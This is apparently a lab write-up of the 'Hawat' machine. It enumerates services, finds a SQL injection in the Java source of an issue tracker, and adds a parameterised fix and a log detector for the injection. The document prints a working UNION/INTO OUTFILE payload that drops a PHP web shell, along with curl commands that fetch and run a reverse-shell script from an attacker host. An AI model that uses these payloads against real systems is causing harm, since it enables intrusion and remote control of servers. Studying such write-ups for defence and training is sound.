Hawat

Enumeration

17445/tcp open   unknown
...
30455/tcp open   http         nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open   http         Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
|_http-title: W3.CSS Template

Weak credentials on 17445 and 50080 web services.

admin:admin

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.145.147
+ Target Port: 30455
...
+ GET /phpinfo.php: Output from the phpinfo() function was found.

Key point:
$_SERVER['DOCUMENT_ROOT'] = /srv/http

There is a file at 50080: issuetracker.zip

issuetracker.zip ---

@GetMapping("/issue/checkByPriority")
...
conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);
String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
System.out.println(query);
Statement stmt = conn.createStatement();
stmt.executeQuery(query);
...

SQL Injection -> priority parameter (concatenated straight into the query string, then run with Statement.executeQuery)
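The same lookup written so that the priority value can never become SQL syntax. This is an added example, not code from issuetracker.zip; the class name and the Low/Normal/High allow-list are assumptions about the application.

```java
// Added example: the /issue/checkByPriority lookup written so that user input is never
// concatenated into SQL. Not from issuetracker.zip; class name and the set of valid
// priorities are assumptions.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

public class IssueRepository {

    // Assumed allow-list. A lookup value outside it is rejected before any SQL runs,
    // so a quote, UNION or INTO OUTFILE in the parameter never reaches MySQL.
    private static final Set<String> ALLOWED_PRIORITIES = Set.of("Low", "Normal", "High");

    private final Connection conn;

    public IssueRepository(Connection conn) {
        this.conn = conn;
    }

    // Vulnerable form from the writeup, for comparison only (not executed here):
    //   "SELECT message FROM issue WHERE priority='" + priority + "'"
    // The closing quote in the input ends the literal and the remainder runs as SQL.

    public List<String> messagesByPriority(String priority) throws SQLException {
        if (priority == null || !ALLOWED_PRIORITIES.contains(priority)) {
            throw new IllegalArgumentException("unknown priority");
        }
        // SQL text is constant; the value travels as a bound parameter, so even if the
        // allow-list were removed the driver would still treat it as data, not syntax.
        String sql = "SELECT message FROM issue WHERE priority = ?";
        List<String> messages = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, priority);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    messages.add(rs.getString("message"));
                }
            }
        }
        return messages;
    }
}
```

Two further layers matter on the database side, independent of the application fix: INTO OUTFILE requires the MySQL FILE privilege, which the issue_tracker account has no reason to hold, and secure_file_priv limits where mysqld will write (a directory restricts it, NULL disables it). The write into /srv/http also depends on that directory being writable by the mysqld user, which is the condition a file-system permission review should catch.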

Access

Key payload:
"<?php system($_GET['cmd']);?>"

Main payload:
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/srv/http/cmd.php'; -- 

The SQL Query:
SELECT message FROM issue WHERE priority='Normal' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/srv/http/cmd.php'; -- '

Request:
POST /issue/checkByPriority?priority=Normal' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/srv/http/cmd.php'; --

URL Encoded:
POST /issue/checkByPriority?priority=Normal'%20UNION%20SELECT%20%22%3c%3fphp%20system(%24_GET%5b'cmd'%5d)%3b%20%3f%3e%22%20INTO%20OUTFILE%20%22%2fsrv%2fhttp%2fcmd.php%22%3b%20--%20 HTTP/1.1
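From the defender's side, this is what the access log records: the request target arrives URL-encoded, so a log search for the literal strings UNION SELECT or INTO OUTFILE misses it. The following is an added example, not part of the writeup; it decodes a logged target and checks for the markers the page's payload carries. The log line is constructed around the request above, and the marker list is an assumption about what a legitimate priority value never contains.

```java
// Added example: decode a logged request target and flag the markers of the injection
// seen above. Not part of the writeup; the sample log line is constructed from the
// URL-encoded request on the page.
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class SqliRequestCheck {

    // Patterns a legitimate priority value never contains (assumed marker set).
    private static final List<Pattern> MARKERS = List.of(
        Pattern.compile("(?i)\\bunion\\b\\s+(all\\s+)?select\\b"),
        Pattern.compile("(?i)\\binto\\s+(out|dump)file\\b"),
        Pattern.compile("<\\?php"),
        Pattern.compile("[';]\\s*(--|#)")
    );

    // Decode up to three times so double-encoded payloads surface too; a malformed
    // percent sequence stops decoding and the last good form is returned.
    public static String decode(String target) {
        String cur = target;
        for (int i = 0; i < 3; i++) {
            String next;
            try {
                next = URLDecoder.decode(cur, StandardCharsets.UTF_8);
            } catch (IllegalArgumentException e) {
                break;
            }
            if (next.equals(cur)) {
                break;
            }
            cur = next;
        }
        return cur;
    }

    // Returns the patterns that matched the decoded target; empty means nothing flagged.
    public static List<String> findMarkers(String target) {
        String decoded = decode(target);
        List<String> hits = new ArrayList<>();
        for (Pattern p : MARKERS) {
            if (p.matcher(decoded).find()) {
                hits.add(p.pattern());
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed access-log entry; the request target is the one from the writeup.
        String logLine = "192.168.49.145 - - [01/Jan/2021:12:00:00 +0000] \"POST /issue/checkByPriority?"
            + "priority=Normal'%20UNION%20SELECT%20%22%3c%3fphp%20system(%24_GET%5b'cmd'%5d)%3b%20%3f%3e%22"
            + "%20INTO%20OUTFILE%20%22%2fsrv%2fhttp%2fcmd.php%22%3b%20--%20 HTTP/1.1\" 200 12";
        // The request line sits between the first pair of double quotes; the target is
        // its second space-separated field.
        String target = logLine.split("\"")[1].split(" ")[1];
        List<String> hits = findMarkers(target);
        if (hits.isEmpty()) {
            System.out.println("clean: " + target);
        } else {
            System.out.println("flagged " + hits.size() + " markers in: " + decode(target));
        }
    }
}
```

Run against the constructed line, all four markers match once the target is decoded. The decode step is the point: matching on the raw logged bytes would see `%20UNION%20SELECT` and `%3c%3fphp` and report nothing.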

https://www.revshells.com/ - Bash 196 - 443 port - Reverse Shell

$ curl 'http://192.168.145.147:30455/cmd.php?cmd=wget http://192.168.49.145:443/shell.sh'
$ curl 'http://192.168.145.147:30455/cmd.php?cmd=bash -p shell.sh'
